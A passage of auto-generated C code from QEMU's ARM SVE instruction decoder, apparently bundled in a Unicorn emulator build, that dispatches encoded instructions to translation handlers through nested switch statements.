disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_UMULH_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x14: /* 00000100 ..010100 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:262 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_SDIV_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x15: /* 00000100 ..010101 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:263 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_UDIV_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x16: /* 00000100 ..010110 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:264 */ disas_sve_extract_rdm_pg_rn(ctx, &u.f_rprr_esz, insn); if (trans_SDIV_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x17: /* 00000100 ..010111 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:265 */ disas_sve_extract_rdm_pg_rn(ctx, &u.f_rprr_esz, insn); if (trans_UDIV_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x18: /* 00000100 ..011000 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:239 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_ORR_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x19: /* 00000100 ..011001 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:240 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_EOR_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x1a: /* 00000100 ..011010 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:241 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_AND_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x1b: /* 00000100 ..011011 000..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:242 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_BIC_zpzz(ctx, &u.f_rprr_esz)) return true; return false; } return false; case 0x1: /* 00000100 ..0..... 001..... ........ */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); switch ((insn >> 16) & 0x1f) { case 0x0: /* 00000100 ..000000 001..... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:281 */ if (trans_SADDV(ctx, &u.f_rpr_esz)) return true; return false; case 0x1: /* 00000100 ..000001 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:280 */ if (trans_UADDV(ctx, &u.f_rpr_esz)) return true; return false; case 0x8: /* 00000100 ..001000 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:284 */ if (trans_SMAXV(ctx, &u.f_rpr_esz)) return true; return false; case 0x9: /* 00000100 ..001001 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:285 */ if (trans_UMAXV(ctx, &u.f_rpr_esz)) return true; return false; case 0xa: /* 00000100 ..001010 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:286 */ if (trans_SMINV(ctx, &u.f_rpr_esz)) return true; return false; case 0xb: /* 00000100 ..001011 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:287 */ if (trans_UMINV(ctx, &u.f_rpr_esz)) return true; return false; case 0x10: /* 00000100 ..010000 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:275 */ if (trans_MOVPRFX_z(ctx, &u.f_rpr_esz)) return true; return false; case 0x11: /* 00000100 ..010001 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:276 */ if (trans_MOVPRFX_m(ctx, &u.f_rpr_esz)) return true; return false; case 0x18: /* 00000100 ..011000 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:270 */ if (trans_ORV(ctx, &u.f_rpr_esz)) return true; return false; case 0x19: /* 00000100 ..011001 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:271 */ if (trans_EORV(ctx, &u.f_rpr_esz)) return true; return false; case 0x1a: /* 00000100 ..011010 001..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:272 */ if (trans_ANDV(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x2: /* 00000100 ..0..... 010..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:352 */ disas_sve_extract_rda_pg_rn_rm(ctx, &u.f_rprrr_esz, insn); if (trans_MLA(ctx, &u.f_rprrr_esz)) return true; return false; case 0x3: /* 00000100 ..0..... 011..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:353 */ disas_sve_extract_rda_pg_rn_rm(ctx, &u.f_rprrr_esz, insn); if (trans_MLS(ctx, &u.f_rprrr_esz)) return true; return false; case 0x4: /* 00000100 ..0..... 100..... ........ */ switch ((insn >> 16) & 0x1f) { case 0x0: /* 00000100 ..000000 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:292 */ disas_sve_extract_rdn_pg_tszimm(ctx, &u.f_rpri_esz, insn); u.f_rpri_esz.imm = tszimm_shr(ctx, deposit32(extract32(insn, 5, 5), 5, 27, extract32(insn, 22, 2))); if (trans_ASR_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x1: /* 00000100 ..000001 100..... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:294 */ disas_sve_extract_rdn_pg_tszimm(ctx, &u.f_rpri_esz, insn); u.f_rpri_esz.imm = tszimm_shr(ctx, deposit32(extract32(insn, 5, 5), 5, 27, extract32(insn, 22, 2))); if (trans_LSR_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x3: /* 00000100 ..000011 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:296 */ disas_sve_extract_rdn_pg_tszimm(ctx, &u.f_rpri_esz, insn); u.f_rpri_esz.imm = tszimm_shl(ctx, deposit32(extract32(insn, 5, 5), 5, 27, extract32(insn, 22, 2))); if (trans_LSL_zpzi(ctx, &u.f_rpri_esz)) return true; return false; case 0x4: /* 00000100 ..000100 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:298 */ disas_sve_extract_rdn_pg_tszimm(ctx, &u.f_rpri_esz, insn); u.f_rpri_esz.imm = tszimm_shr(ctx, deposit32(extract32(insn, 5, 5), 5, 27, extract32(insn, 22, 2))); if (trans_ASRD(ctx, &u.f_rpri_esz)) return true; return false; case 0x10: /* 00000100 ..010000 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:302 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_ASR_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x11: /* 00000100 ..010001 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:303 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_LSR_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x13: /* 00000100 ..010011 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:304 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_LSL_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x14: /* 00000100 ..010100 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:305 */ disas_sve_extract_rdm_pg_rn(ctx, &u.f_rprr_esz, insn); if (trans_ASR_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x15: /* 00000100 ..010101 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:306 */ disas_sve_extract_rdm_pg_rn(ctx, &u.f_rprr_esz, insn); if (trans_LSR_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x17: /* 00000100 ..010111 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:307 */ disas_sve_extract_rdm_pg_rn(ctx, &u.f_rprr_esz, insn); if (trans_LSL_zpzz(ctx, &u.f_rprr_esz)) return true; return false; case 0x18: /* 00000100 ..011000 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:311 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_ASR_zpzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x19: /* 00000100 ..011001 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:312 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_LSR_zpzw(ctx, &u.f_rprr_esz)) return true; return false; case 0x1b: /* 00000100 ..011011 100..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:313 */ disas_sve_extract_rdn_pg_rm(ctx, &u.f_rprr_esz, insn); if (trans_LSL_zpzw(ctx, &u.f_rprr_esz)) return true; return false; } return false; case 0x5: /* 00000100 ..0..... 101..... 
........ */ disas_sve_extract_rd_pg_rn(ctx, &u.f_rpr_esz, insn); switch ((insn >> 16) & 0x1f) { case 0x10: /* 00000100 ..010000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:331 */ if (trans_SXTB(ctx, &u.f_rpr_esz)) return true; return false; case 0x11: /* 00000100 ..010001 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:332 */ if (trans_UXTB(ctx, &u.f_rpr_esz)) return true; return false; case 0x12: /* 00000100 ..010010 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:333 */ if (trans_SXTH(ctx, &u.f_rpr_esz)) return true; return false; case 0x13: /* 00000100 ..010011 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:334 */ if (trans_UXTH(ctx, &u.f_rpr_esz)) return true; return false; case 0x14: /* 00000100 ..010100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:335 */ if (trans_SXTW(ctx, &u.f_rpr_esz)) return true; return false; case 0x15: /* 00000100 ..010101 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:336 */ if (trans_UXTW(ctx, &u.f_rpr_esz)) return true; return false; case 0x16: /* 00000100 ..010110 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:329 */ if (trans_ABS(ctx, &u.f_rpr_esz)) return true; return false; case 0x17: /* 00000100 ..010111 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:330 */ if (trans_NEG(ctx, &u.f_rpr_esz)) return true; return false; case 0x18: /* 00000100 ..011000 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:319 */ if (trans_CLS(ctx, &u.f_rpr_esz)) return true; return false; case 0x19: /* 00000100 ..011001 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:320 */ if (trans_CLZ(ctx, &u.f_rpr_esz)) return true; return false; case 0x1a: /* 00000100 ..011010 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:321 */ if (trans_CNT_zpz(ctx, &u.f_rpr_esz)) return true; return false; case 0x1b: /* 00000100 ..011011 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:322 */ if (trans_CNOT(ctx, &u.f_rpr_esz)) return true; return false; case 0x1c: /* 00000100 ..011100 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:324 */ if (trans_FABS(ctx, &u.f_rpr_esz)) return true; return false; case 0x1d: /* 00000100 ..011101 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:325 */ if (trans_FNEG(ctx, &u.f_rpr_esz)) return true; return false; case 0x1e: /* 00000100 ..011110 101..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:323 */ if (trans_NOT_zpz(ctx, &u.f_rpr_esz)) return true; return false; } return false; case 0x6: /* 00000100 ..0..... 110..... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:356 */ disas_sve_extract_rdn_pg_ra_rm(ctx, &u.f_rprrr_esz, insn); if (trans_MLA(ctx, &u.f_rprrr_esz)) return true; return false; case 0x7: /* 00000100 ..0..... 111..... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:357 */ disas_sve_extract_rdn_pg_ra_rm(ctx, &u.f_rprrr_esz, insn); if (trans_MLS(ctx, &u.f_rprrr_esz)) return true; return false; } return false; case 0x00200000: /* 00000100 ..1..... ........ ........ */ switch ((insn >> 12) & 0xf) { case 0x0: /* 00000100 ..1..... 0000.... ........ */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); switch ((insn >> 10) & 0x3) { case 0x0: /* 00000100 ..1..... 000000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:362 */ if (trans_ADD_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x1: /* 00000100 ..1..... 000001.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:363 */ if (trans_SUB_zzz(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x1: /* 00000100 ..1..... 0001.... ........ */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); switch ((insn >> 10) & 0x3) { case 0x0: /* 00000100 ..1..... 000100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:364 */ if (trans_SQADD_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x1: /* 00000100 ..1..... 000101.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:365 */ if (trans_UQADD_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x2: /* 00000100 ..1..... 000110.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:366 */ if (trans_SQSUB_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x3: /* 00000100 ..1..... 000111.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:367 */ if (trans_UQSUB_zzz(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x3: /* 00000100 ..1..... 0011.... ........ */ disas_sve_extract_rd_rn_rm_e0(ctx, &u.f_rrr_esz, insn); switch (insn & 0x00c00c00) { case 0x00000000: /* 00000100 001..... 001100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:372 */ if (trans_AND_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x00400000: /* 00000100 011..... 001100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:373 */ if (trans_ORR_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x00800000: /* 00000100 101..... 001100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:374 */ if (trans_EOR_zzz(ctx, &u.f_rrr_esz)) return true; return false; case 0x00c00000: /* 00000100 111..... 001100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:375 */ if (trans_BIC_zzz(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x4: /* 00000100 ..1..... 0100.... ........ */ switch ((insn >> 10) & 0x3) { case 0x0: /* 00000100 ..1..... 010000.. ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:380 */ disas_sve_extract_disas_sve_Fmt_55(ctx, &u.f_disas_sve25, insn); if (trans_INDEX_ii(ctx, &u.f_disas_sve25)) return true; return false; case 0x1: /* 00000100 ..1..... 010001.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:386 */ disas_sve_extract_disas_sve_Fmt_57(ctx, &u.f_rri_esz, insn); if (trans_INDEX_ri(ctx, &u.f_rri_esz)) return true; return false; case 0x2: /* 00000100 ..1..... 010010.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:383 */ disas_sve_extract_disas_sve_Fmt_56(ctx, &u.f_disas_sve26, insn); if (trans_INDEX_ir(ctx, &u.f_disas_sve26)) return true; return false; case 0x3: /* 00000100 ..1..... 010011.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:389 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_INDEX_rr(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x5: /* 00000100 ..1..... 0101.... ........ */ switch (insn & 0x00c00800) { case 0x00000000: /* 00000100 001..... 01010... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:394 */ disas_sve_extract_rd_rn_i6(ctx, &u.f_rri, insn); if (trans_ADDVL(ctx, &u.f_rri)) return true; return false; case 0x00400000: /* 00000100 011..... 01010... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:395 */ disas_sve_extract_rd_rn_i6(ctx, &u.f_rri, insn); if (trans_ADDPL(ctx, &u.f_rri)) return true; return false; case 0x00800000: /* 00000100 101..... 01010... ........ */ disas_sve_extract_disas_sve_Fmt_58(ctx, &u.f_disas_sve27, insn); switch ((insn >> 16) & 0x1f) { case 0x1f: /* 00000100 10111111 01010... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:398 */ if (trans_RDVL(ctx, &u.f_disas_sve27)) return true; return false; } return false; } return false; case 0x8: /* 00000100 ..1..... 1000.... ........ */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); switch ((insn >> 10) & 0x3) { case 0x0: /* 00000100 ..1..... 100000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:412 */ if (trans_ASR_zzw(ctx, &u.f_rrr_esz)) return true; return false; case 0x1: /* 00000100 ..1..... 100001.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:413 */ if (trans_LSR_zzw(ctx, &u.f_rrr_esz)) return true; return false; case 0x3: /* 00000100 ..1..... 100011.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:414 */ if (trans_LSL_zzw(ctx, &u.f_rrr_esz)) return true; return false; } return false; case 0x9: /* 00000100 ..1..... 1001.... ........ */ disas_sve_extract_rd_rn_tszimm(ctx, &u.f_rri_esz, insn); switch ((insn >> 10) & 0x3) { case 0x0: /* 00000100 ..1..... 100100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:403 */ u.f_rri_esz.imm = tszimm_shr(ctx, deposit32(extract32(insn, 16, 5), 5, 27, extract32(insn, 22, 2))); if (trans_ASR_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x1: /* 00000100 ..1..... 100101.. ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:405 */ u.f_rri_esz.imm = tszimm_shr(ctx, deposit32(extract32(insn, 16, 5), 5, 27, extract32(insn, 22, 2))); if (trans_LSR_zzi(ctx, &u.f_rri_esz)) return true; return false; case 0x3: /* 00000100 ..1..... 100111.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:407 */ u.f_rri_esz.imm = tszimm_shl(ctx, deposit32(extract32(insn, 16, 5), 5, 27, extract32(insn, 22, 2))); if (trans_LSL_zzi(ctx, &u.f_rri_esz)) return true; return false; } return false; case 0xa: /* 00000100 ..1..... 1010.... ........ */ disas_sve_extract_rd_rn_msz_rm(ctx, &u.f_rrri, insn); switch ((insn >> 22) & 0x3) { case 0x0: /* 00000100 001..... 1010.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:419 */ if (trans_ADR_s32(ctx, &u.f_rrri)) return true; return false; case 0x1: /* 00000100 011..... 1010.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:420 */ if (trans_ADR_u32(ctx, &u.f_rrri)) return true; return false; case 0x2: /* 00000100 101..... 1010.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:421 */ if (trans_ADR_p32(ctx, &u.f_rrri)) return true; return false; case 0x3: /* 00000100 111..... 1010.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:422 */ if (trans_ADR_p64(ctx, &u.f_rrri)) return true; return false; } return false; case 0xb: /* 00000100 ..1..... 1011.... ........ */ switch ((insn >> 10) & 0x3) { case 0x0: /* 00000100 ..1..... 101100.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:435 */ disas_sve_extract_rd_rn_rm(ctx, &u.f_rrr_esz, insn); if (trans_FTSSEL(ctx, &u.f_rrr_esz)) return true; return false; case 0x2: /* 00000100 ..1..... 101110.. ........ */ disas_sve_extract_rd_rn(ctx, &u.f_rr_esz, insn); switch ((insn >> 16) & 0x1f) { case 0x0: /* 00000100 ..100000 101110.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:431 */ if (trans_FEXPA(ctx, &u.f_rr_esz)) return true; return false; } return false; case 0x3: /* 00000100 ..1..... 101111.. ........ */ disas_sve_extract_disas_sve_Fmt_59(ctx, &u.f_disas_sve28, insn); switch (insn & 0x00df0000) { case 0x00000000: /* 00000100 00100000 101111.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:427 */ if (trans_MOVPRFX(ctx, &u.f_disas_sve28)) return true; return false; } return false; } return false; case 0xc: /* 00000100 ..1..... 1100.... ........ */ disas_sve_extract_incdec2_cnt(ctx, &u.f_incdec2_cnt, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* 00000100 ..10.... 1100.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:455 */ u.f_incdec2_cnt.d = extract32(insn, 11, 1); u.f_incdec2_cnt.u = extract32(insn, 10, 1); if (trans_SINCDEC_v(ctx, &u.f_incdec2_cnt)) return true; return false; case 0x1: /* 00000100 ..11.... 1100.... ........ */ switch ((insn >> 11) & 0x1) { case 0x0: /* 00000100 ..11.... 11000... ........ 
*/ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:451 */ u.f_incdec2_cnt.d = extract32(insn, 10, 1); u.f_incdec2_cnt.u = 1; if (trans_INCDEC_v(ctx, &u.f_incdec2_cnt)) return true; return false; } return false; } return false; case 0xe: /* 00000100 ..1..... 1110.... ........ */ disas_sve_extract_incdec_cnt(ctx, &u.f_incdec_cnt, insn); switch (insn & 0x00100800) { case 0x00000000: /* 00000100 ..10.... 11100... ........ */ switch ((insn >> 10) & 0x1) { case 0x0: /* 00000100 ..10.... 111000.. ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:440 */ u.f_incdec_cnt.d = 0; u.f_incdec_cnt.u = 1; if (trans_CNT_r(ctx, &u.f_incdec_cnt)) return true; return false; } return false; case 0x00100000: /* 00000100 ..11.... 11100... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:443 */ u.f_incdec_cnt.d = extract32(insn, 10, 1); u.f_incdec_cnt.u = 1; if (trans_INCDEC_r(ctx, &u.f_incdec_cnt)) return true; return false; } return false; case 0xf: /* 00000100 ..1..... 1111.... ........ */ disas_sve_extract_incdec_cnt(ctx, &u.f_incdec_cnt, insn); switch ((insn >> 20) & 0x1) { case 0x0: /* 00000100 ..10.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:446 */ u.f_incdec_cnt.d = extract32(insn, 11, 1); u.f_incdec_cnt.u = extract32(insn, 10, 1); if (trans_SINCDEC_r_32(ctx, &u.f_incdec_cnt)) return true; return false; case 0x1: /* 00000100 ..11.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:447 */ u.f_incdec_cnt.d = extract32(insn, 11, 1); u.f_incdec_cnt.u = extract32(insn, 10, 1); if (trans_SINCDEC_r_64(ctx, &u.f_incdec_cnt)) return true; return false; } return false; } return false; case 0x01000000: /* 00000101 ..0..... ........ ........ */ switch ((insn >> 20) & 0x1) { case 0x0: /* 00000101 ..00.... ........ ........ */ switch (insn & 0x00cc0000) { case 0x00000000: /* 00000101 000000.. ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:460 */ disas_sve_extract_rdn_dbm(ctx, &u.f_rr_dbm, insn); if (trans_ORR_zzi(ctx, &u.f_rr_dbm)) return true; return false; case 0x00400000: /* 00000101 010000.. ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:461 */ disas_sve_extract_rdn_dbm(ctx, &u.f_rr_dbm, insn); if (trans_EOR_zzi(ctx, &u.f_rr_dbm)) return true; return false; case 0x00800000: /* 00000101 100000.. ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:462 */ disas_sve_extract_rdn_dbm(ctx, &u.f_rr_dbm, insn); if (trans_AND_zzi(ctx, &u.f_rr_dbm)) return true; return false; case 0x00c00000: /* 00000101 110000.. ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/sve.decode:465 */ disas_sve_extract_disas_sve_Fmt_60(ctx, &u.f_disas_sve29, insn); if (trans_DUPM(ctx, &u.f_disas_sve29)) return true; return false; } return false; case 0x1: /* 00000101 ..01.... ........ 